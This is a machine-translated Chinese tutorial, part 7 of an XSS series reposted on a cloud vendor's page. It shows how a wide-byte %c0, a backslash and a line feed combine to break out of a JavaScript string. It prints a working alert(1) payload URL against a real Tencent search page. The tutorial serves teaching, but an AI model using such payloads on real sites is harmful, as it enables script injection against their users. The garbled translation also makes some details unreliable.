In those years, we will learn XSS-7 together. Take revenge together with the byte, backslash, and linefeed.

Source: Internet
Author: User

This time, three guys are together ~
1. The instance points are as follows:

Http://cgi.data.tech.qq.com/index.php? Mod = search & type = data & site = digi & libid = 2 & curpage = 1 & pagenum = 30 & filterattr = 138,138 | 16 | 3500, 4000 & filtervalue =, % B4 % F3 % D3 % DA4000 | % D0 % FD % D7 % AA | WCDMA, WCDMA, hsdpa, hsdpa&tplname=centersearch.shtml & orderby = aaaaaaaaaaaa


Old Rules: continue to look at our output.

 


2. There are three outputs in total, which are located in the HTML attribute. We gave up because double quotation marks are eliminated. There are still two places left. They are all located in <script>... </script> and together.

3. Let's first look at 2nd. Is it similar? Yes. I just met it in tutorial 6. That is, the output is in the [comment. Can we use line breaks?

 


4. One is good news, and the other is bad news .. The following is a good thing .. Swollen.

5. At this time, we need to first talk about javascript.

Javascript. Strings can be written in multiple lines below.

Var a = "I Am a string \
I am still a string ";

Alert ();


6. Based on this, we can create the defect points as shown below.

// Document. getElementById ("order_select"). value = "aaaa \
Alert (1 );//";

Var searchOrder = "aaaa \
Alert (1 );//";


The code structure is parsed as follows:

 


7. With this idea, please refer to our backslash ..

 


8. The tragedy is that the backslash is filtered into two \, which is hard to solve.

9. Do you still remember the wide byte usage we mentioned in tutorial 4? % C0 can be eaten.

Let's take a look at the page encoding.

<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"/>


Gbxxx series.

10. So, our % c0 also joined the battle.

Http://cgi.data.tech.qq.com/index.php? Mod = search & type = data & site = digi & libid = 2 & curpage = 1 & pagenum = 30 & filterattr = 138,138 | 16 | 3500, 4000 & filtervalue =, % B4 % F3 % D3 % DA4000 | % D0 % FD % D7 % AA | WCDMA, WCDMA, hsdpa,hsdpa&tplname=centersearch.shtml & orderby = aaaa % c0 % 5c % 0 aalert (1 );//


Look at the output in the source code. \ We turned it into garbled code + \

 
 


11. At this time, punctuation marks are in a meeting. The theme of the meeting is: "Hello everyone, it's really good"
 Solution:
Follow the previous tutorial:

In those years, we will learn XSS-4. byte revenge record [QQ mail Basics]
In those years, we will learn XSS-5. backlash revenge
In those years, we learned XSS-6. newline character revenge

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.